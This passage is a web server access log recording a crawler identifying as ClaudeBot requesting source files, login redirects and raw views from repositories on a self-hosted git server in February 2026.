+0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10201] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11668] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 216.73.216.188] [Length 10999] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 216.73.216.188] [Length 11716] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13889] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16483] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14667] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14209] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13940] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13169] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12802] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11515] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 